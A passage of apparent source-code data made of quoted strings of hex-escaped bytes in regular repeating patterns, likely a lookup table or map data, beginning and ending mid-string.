2\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70","\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F","\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C","\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A","\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF","\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47","\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65\x45\xFF\x65\x66","\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF","\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61","\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61","\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64","\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65","\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67","\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF","\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A","\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B","\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF","\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F","\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71","\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74","\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75","\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77","\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF","\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A","\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B","\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF","\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x10\x2F","\x60\x10\x30\x61\x10\x31\x62\x10\x32\x63\x10\x33\x64\x10\x34\x65","\x10\x35\x66\x10\x36\x67\x10\x37\x68\x10\x38\x69\x10\x39\x6A\x10","\x3A\x6B\x10\x3B\x6C\x10\x3C\x6D\x10\x3D\x6E\x10\x3E\x6F\x10\x3F","\x70\xFF\x50\x10\x11\x2E\x60\x11\x2F\x61\x11\x30\x62\x11\x31\x63","\x11\x32\x64\x11\x33\x65\x11\x34\x66\x11\x35\x67\x11\x36\x68\x11","\x37\x69\x11\x38\x6A\x11\x39\x6B\x11\x3A\x6C\x11\x3B\x6D\x11\x3C","\x6E\x11\x3D\x6F\x11\x3E\x70\x11\x3F\x71\xFF\x7F\x5F\xFF\x5F\x7F","\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E","\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B","\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59","\xFF\x79\x7A\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF","\x77\x57\xFF\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56","\x76\xFF\x75\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75","\x75\x54\x74\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF","\x72\x73\x73\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70","\x50\xFF\x70\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F","\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E","\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B","\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49","\xFF\x69\x6A\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF","\x67\x47\xFF\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46","\x66\xFF\x65\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65","\x65\x44\x64\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF","\x62\x63\x63\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60","\x40\xFF\x61\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62","\xFF\x62\x63\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65","\x44\x64\xFF\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66","\x45\x67\x46\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68","\xFF\x68\x47\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF","\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B","\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C","\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF","\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70","\x71\xFF\x71\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72","\xFF\x72\x73\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75","\x54\x74\xFF\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76","\x55\x77\x56\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78","\xFF\x78\x57\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF","\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B","\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C","\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF","\x7F\x5E\xFF\x5F\x7F\x11\x2E\x60\x11\x2F\x61\x11\x30\x62\x11\x31","\x63\x11\x32\x64\x11\x33\x65\x11\x34\x66\x11\x35\x67\x11\x36\x68","\x11\x37\x69\x11\x38\x6A\x11\x39\x6B\x11\x3A\x6C\x11\x3B\x6D\x11","\x3C\x6E\x11\x3D\x6F\x11\x3E\x70\x11\x3F\x71\xFF\x51\x11\x12\x2D","\x60\x12\x2E\x61\x12\x2F\x62\x12\x30\x63\x12\x31\x64\x12\x32\x65","\x12\x33\x66\x12\x34\x67\x12\x35\x68\x12\x36\x69\x12\x37\x6A\x12","\x38\x6B\x12\x39\x6C\x12\x3A\x6D\x12\x3B\x6E\x12\x3C\x6F\x12\x3D","\x70\x12\x3E\x71\x12\x3F\x72\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E","\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF","\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B","\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A","\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF","\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75","\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74","\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73","\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70","\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E","\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF","\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B","\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A","\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF","\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65","\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64","\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63","\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61","\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63","\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF","\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46","\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47","\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF","\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B","\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D","\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70","\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71","\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73","\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF","\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56","\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57","\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF","\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B","\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D","\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF","\x5F\x7F\x12\x2D\x60\x12\x2E\x61\x12\x2F\x62\x12\x30\x63\x12\x31","\x64\x12\x32\x65\x12\x33\x66\x12\x34\x67\x12\x35\x68\x12\x36\x69","\x12\x37\x6A\x12\x38\x6B\x12\x39\x6C\x12\x3A\x6D\x12\x3B\x6E\x12","\x3C\x6F\x12\x3D\x70\x12\x3E\x71\x12\x3F\x72\xFF\x52\x12\x13\x2C","\x60\x13\x2D\x61\x13\x2E\x62\x13\x2F\x63\x13\x30\x64\x13\x31\x65","\x13\x32\x66\x13\x33\x67\x13\x34\x68\x13\x35\x69\x13\x36\x6A\x13","\x37\x6B\x13\x38\x6C\x13\x39\x6D\x13\x3A\x6E\x13\x3B\x6F\x13\x3C","\x70\x13\x3D\x71\x13\x3E\x72\x13\x3F\x73\xFF\x7F\x5F\xFF\x5F\x7F","\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E","\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B","\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59","\xFF\x79\x7A\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF","\x77\x57\xFF\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56","\x76\xFF\x75\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75","\x75\x54\x74\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF","\x72\x73\x73\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70","\x50\xFF\x70\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F","\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E","\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B","\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49","\xFF\x69\x6A\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF","\x67\x47\xFF\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46","\x66\xFF\x65\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65","\x65\x44\x64\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF","\x62\x63\x63\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60","\x40\xFF\x61\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62","\xFF\x62\x63\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65","\x44\x64\xFF\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66","\x45\x67\x46\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68","\xFF\x68\x47\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF","\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B","\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C","\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF","\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70","\x71\xFF\x71\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72","\xFF\x72\x73\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75","\x54\x74\xFF\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76","\x55\x77\x56\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78","\xFF\x78\x57\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF","\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B","\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C","\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF","\x7F\x5E\xFF\x5F\x7F\x13\x2C\x60\x13\x2D\x61\x13\x2E\x62\x13\x2F","\x63\x13\x30\x64\x13\x31\x65\x13\x32\x66\x13\x33\x67\x13\x34\x68","\x13\x35\x69\x13\x36\x6A\x13\x37\x6B\x13\x38\x6C\x13\x39\x6D\x13","\x3A\x6E\x13\x3B\x6F\x13\x3C\x70\x13\x3D\x71\x13\x3E\x72\x13\x3F","\x73\xFF\x53\x13\x14\x2B\x60\x14\x2C\x61\x14\x2D\x62\x14\x2E\x63","\x14\x2F\x64\x14\x30\x65\x14\x31\x66\x14\x32\x67\x14\x33\x68\x14","\x34\x69\x14\x35\x6A\x14\x36\x6B\x14\x37\x6C\x14\x38\x6D\x14\x39","\x6E\x14\x3A\x6F\x14\x3B\x70\x14\x3C\x71\x14\x3D\x72\x14\x3E\x73","\x14\x3F\x74\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F","\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C","\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A","\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x7A\x59\x79\xFF","\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF\x77\x78\x78\x57","\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75\x55\xFF\x75\x76","\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74\xFF\x73\x53\xFF","\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73\x52\x72\xFF\x71","\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70","\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F","\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C","\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A","\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF","\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47","\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65\x45\xFF\x65\x66","\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF","\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61","\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61","\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64","\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65","\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67","\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF","\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A","\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B","\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF","\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F","\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71","\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74","\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75","\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77","\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF","\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A","\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B","\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF","\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x14\x2B","\x60\x14\x2C\x61\x14\x2D\x62\x14\x2E\x63\x14\x2F\x64\x14\x30\x65","\x14\x31\x66\x14\x32\x67\x14\x33\x68\x14\x34\x69\x14\x35\x6A\x14","\x36\x6B\x14\x37\x6C\x14\x38\x6D\x14\x39\x6E\x14\x3A\x6F\x14\x3B","\x70\x14\x3C\x71\x14\x3D\x72\x14\x3E\x73\x14\x3F\x74\xFF\x54\x14","\x15\x2A\x60\x15\x2B\x61\x15\x2C\x62\x15\x2D\x63\x15\x2E\x64\x15","\x2F\x65\x15\x30\x66\x15\x31\x67\x15\x32\x68\x15\x33\x69\x15\x34","\x6A\x15\x35\x6B\x15\x36\x6C\x15\x37\x6D\x15\x38\x6E\x15\x39\x6F","\x15\x3A\x70\x15\x3B\x71\x15\x3C\x72\x15\x3D\x73\x15\x3E\x74\x15","\x3F\x75\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E","\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D","\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF","\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x7A\x59\x79\xFF\x78","\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF\x77\x78\x78\x57\x77","\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75\x55\xFF\x75\x76\x76","\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74\xFF\x73\x53\xFF\x73","\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73\x52\x72\xFF\x71\x51","\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70\xFF","\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E","\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D","\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF","\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF\x68","\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47\x67","\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65\x45\xFF\x65\x66\x66","\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF\x63","\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61\x41","\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61\xFF","\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64\x43","\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65\x44","\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67\xFF","\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF\x68","\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A","\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D","\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E","\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70","\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71\xFF","\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74\x53","\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75\x54","\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77\xFF","\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF\x78","\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A","\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D","\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E","\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x15\x2A\x60","\x15\x2B\x61\x15\x2C\x62\x15\x2D\x63\x15\x2E\x64\x15\x2F\x65\x15","\x30\x66\x15\x31\x67\x15\x32\x68\x15\x33\x69\x15\x34\x6A\x15\x35","\x6B\x15\x36\x6C\x15\x37\x6D\x15\x38\x6E\x15\x39\x6F\x15\x3A\x70","\x15\x3B\x71\x15\x3C\x72\x15\x3D\x73\x15\x3E\x74\x15\x3F\x75\xFF","\x55\x15\x16\x29\x60\x16\x2A\x61\x16\x2B\x62\x16\x2C\x63\x16\x2D","\x64\x16\x2E\x65\x16\x2F\x66\x16\x30\x67\x16\x31\x68\x16\x32\x69","\x16\x33\x6A\x16\x34\x6B\x16\x35\x6C\x16\x36\x6D\x16\x37\x6E\x16","\x38\x6F\x16\x39\x70\x16\x3A\x71\x16\x3B\x72\x16\x3C\x73\x16\x3D","\x74\x16\x3E\x75\x16\x3F\x76\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E","\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF","\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B","\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A","\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF","\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75","\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74","\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73","\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70","\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E","\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF","\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B","\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A","\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF","\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65","\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64","\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63","\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61","\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63","\xFF\x63\x42\x6